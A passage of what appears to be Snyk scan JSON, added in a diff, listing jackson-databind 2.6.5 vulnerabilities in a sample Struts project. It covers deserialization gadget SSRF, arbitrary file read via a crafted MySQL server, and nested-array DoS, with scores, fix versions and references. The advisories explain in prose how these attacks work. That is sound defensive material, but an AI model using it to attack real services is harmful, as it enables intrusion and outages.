"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": 
"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": 
"Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
